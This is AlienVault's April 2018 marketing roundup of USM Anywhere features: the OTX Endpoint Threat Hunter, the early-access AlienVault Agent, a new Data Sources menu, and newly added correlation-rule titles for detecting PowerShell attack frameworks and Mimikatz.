AlienVault Monthly Product Roundup April 2018

Get the latest security news in your inbox.

We are continuously making improvements and rolling out new features to USM Anywhere to help your team to be more effective at detecting and responding to threats. You can keep up with USM Anywhere releases by reading our release notes in the AlienVault Product Forum. Here is a roundup of the highlights from our April 2018 releases:

Go Threat Hunting with OTX Endpoint Threat Hunter™:

Okay, so technically this one is not a USM Anywhere feature, but it is very cool (and free!) and worth the mention here. Earlier this month, we launched OTX Endpoint Threat Hunter™— a new free service in Open Threat Exchange® (OTX™) that allows anyone to hunt for malware and other threats on their endpoints using the indicators of compromise (IOCs) catalogued in OTX. It’s powerful, easy to use, and completely free.

Introducing our not-so-secret Agent, man:

OTX Endpoint Threat Hunter is powered by the AlienVault Agent—a lightweight and adaptable endpoint agent based on osquery. We plan to extend the use of the AlienVault Agent in USM Anywhere and have already begun to invite USM Anywhere users to request early access to the AlienVault Agent through the product, under the new Agents page. Participation in early access is limited.

The AlienVault Agent provides deep visibility into your environment with File Integrity Monitoring and event forwarding on Windows and Linux endpoints. It is simple and fast to install and has a small footprint. With the AlienVault Agent, you can get to endpoint security insights quickly, without the cost and complexity of a standalone endpoint security solution. We’ll announce general availability later this year, so stay tuned!

Show me the data sources:

When it comes to data collection for threat detection, the first and most important thing to know is whether your data sources are supported and how. To make it easier and faster to navigate data collection in USM Anywhere, we added a new Data Sources menu to the main navigation. This menu consolidates all the different ways USM Anywhere collects data from your environment: Sensors, Agents, and Integrations. The new Integrations page includes tabs for Plugins, Sensor Apps, and AlienApps, which now includes the Forensics and Response App. In addition, we streamlined the existing Settings menu, again making USM Anywhere simple and fast to use.

New and improved data sources:

Speaking of data sources, we regularly add support for new data sources and improve our methods of collection, parsing, and normalization for existing data sources. You can always find our full list of data sources, including AlienApps and plugins, here.

If you don’t see a data source here that you want to support, fear not. AlienVault will build support for most commercially available products at no additional charge. You can submit a request here.

This month, we added or updated the following data sources in USM Anywhere:

Threat Intelligence delivered faster than your Amazon Prime order

Last, but never least, the AlienVault Labs Security Research Team delivers continuous threat intelligence updates to USM Anywhere every single day. This automated, actionable (re: no effort required on your part) threat intelligence keeps your USM Anywhere deployment humming against emerging and evolving threats as they unfold in the wild.

In addition to all the data sources listed above, the AlienVault Labs Security Research Team delivered the following threat intelligence to the USM Anywhere platform this month:

New Correlation Rules

New correlation rule to detect PowerLessShell

New correlation rule to detect common Powershell attack frameworks

New correlation rule to detect Java process spawning

New correlation rule to detect known Mimikatz module in process argument

About the Author:Danielle Russell, AlienVaultDanielle is a Senior Product Marketing Manager at AlienVault, responsible for product messaging and positioning, go-to-market strategy, and sales enablement. Prior to AlienVault, Danielle held a marketing leadership position with an IT software company in the telecommunications industry. Danielle earned a B.S. Life Sciences Communication from the University of Wisconsin.
Read more posts from Danielle Russell ›